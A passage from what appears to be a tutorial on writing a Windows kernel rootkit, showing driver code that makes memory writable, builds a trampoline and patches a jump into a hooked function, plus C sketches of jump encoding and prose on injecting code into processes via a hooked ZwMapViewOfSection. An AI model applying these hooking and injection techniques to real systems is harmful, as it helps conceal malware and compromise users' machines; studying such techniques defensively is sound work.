                if( makeWritable( (PVOID)trampolineAddress, MAX_INSTRUCTION + 5 ) ) // makeWritable makes the memory writable by means of an unexported function

                {

                                // write trampoline function

                                memset( trampolineAddress, 0x90, MAX_INSTRUCTION + 5 ); // +5 covers the jmp EndOfInjectedCode; that jump is useless because we reach EndOfInjectedCode by pushing its address onto the stack, so it can be replaced with no-ops

                                memcpy( trampolineAddress, instruction, instructionLength ); // set the first instruction of original function in the HookTable

                                INJECT_JUMP( trampolineAddress + instructionLength, newOriginalAddress ); //set the jmp to the original function in the HookTable

                                // set original function to jump to trampoline function

                                if( makeWritable( originalAddress, instructionLength + 5 ) ) //to be cautious we make 5 bytes more writable

                                {

                                                INJECT_JUMP( originalAddress, tableAddress ); //here we inject jmp to our HookTable address in original function

                                                return TRUE;

                                }

                }

                return FALSE;

}
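
The arithmetic inside INJECT_JUMP is easier to see outside the driver. The following is a minimal, portable sketch in C, not the rootkit's code: encode_jmp_rel32 and decode_jmp_rel32 are hypothetical helper names, addresses are modelled as 32-bit integers, and the bytes go to an ordinary buffer instead of live process memory. The decoder assumes, as the comment on GET_JUMP above describes, that only the 0xe9 form is accepted and that 0 signals anything else.

```c
#include <assert.h>
#include <stdint.h>

#define JMP_REL32_OPCODE 0xE9u
#define JMP_REL32_SIZE   5u   /* 1 opcode byte + 4 displacement bytes */

/* Hypothetical helper: encode "jmp rel32" into out[0..4] as if the
 * instruction were located at address `from` and had to reach `to`. */
static void encode_jmp_rel32(uint8_t out[5], uint32_t from, uint32_t to)
{
    /* The displacement is counted from the byte AFTER the jmp,
     * hence to - (from + 5). Unsigned arithmetic wraps modulo 2^32,
     * which also gives the right bytes for backward jumps. */
    uint32_t displacement = to - (from + JMP_REL32_SIZE);

    assert(out != 0);
    out[0] = (uint8_t)JMP_REL32_OPCODE;
    out[1] = (uint8_t)(displacement & 0xFFu);          /* little-endian, */
    out[2] = (uint8_t)((displacement >> 8) & 0xFFu);   /* as x86 expects */
    out[3] = (uint8_t)((displacement >> 16) & 0xFFu);
    out[4] = (uint8_t)((displacement >> 24) & 0xFFu);
}

/* Hypothetical helper: recover the target of a "jmp rel32" located at
 * address `from`. Returns 0 when the first byte is not 0xE9. */
static uint32_t decode_jmp_rel32(const uint8_t in[5], uint32_t from)
{
    uint32_t displacement;

    assert(in != 0);
    if (in[0] != JMP_REL32_OPCODE)
        return 0;
    displacement = (uint32_t)in[1]
                 | ((uint32_t)in[2] << 8)
                 | ((uint32_t)in[3] << 16)
                 | ((uint32_t)in[4] << 24);
    return from + JMP_REL32_SIZE + displacement;
}
```

For example, a jump placed at 0x00401000 that targets 0x00402000 is encoded as e9 fb 0f 00 00, because 0x00402000 - (0x00401000 + 5) = 0xffb.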

After getHookPointers retrieves the addresses of the code in the calling process (line 35), we write the references to the required kernel32 library functions (lines 40 to 73). Remember that we cannot simply call these functions, because we do not know whether the calling process holds references to them. In lines 83 to 93 we take the addresses of the code to be injected as it exists in OUR code (the rootkit), so that we can copy it to its destination in the calling process. In lines 103 to 143 we write into the HookTable the parameters supplied by the hooked kernel function (the parameters used to adjust the stack, passed from the hooked ZwMapViewOfSection), the original function's first instruction, and the jump back to its second instruction, taking into account that several functions may be hooked.
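
The search for START_OF_TRAMPOLINE_PATTERN can also be tried in isolation. The sketch below is an illustration under stated assumptions rather than the code from the listing: find_dword_marker is a hypothetical name, the marker value is passed in as a parameter, and the function returns -1 when the marker is absent so that the caller can stop instead of continuing with an unset offset. It also checks the last position at which a 4-byte marker can still fit in the buffer.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: return the byte offset of the first occurrence of a
 * 32-bit marker inside buf, or -1 if the marker does not occur. */
static long find_dword_marker(const uint8_t *buf, size_t len, uint32_t marker)
{
    size_t i;

    if (buf == NULL || len < sizeof marker)
        return -1;

    /* i + 4 <= len keeps every 4-byte read inside the buffer while still
     * testing the final position where the marker could start. */
    for (i = 0; i + sizeof marker <= len; i++) {
        uint32_t value;
        memcpy(&value, buf + i, sizeof value); /* safe for unaligned offsets */
        if (value == marker)
            return (long)i;
    }
    return -1;
}
```

With a table that starts with two no-ops and a 5-byte jmp followed by the marker, the function returns 7, the offset of the first marker byte; a caller would treat -1 as a reason to abandon the hook.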

Read 1822 times Last modified on Saturday, 30 May 2015 18:25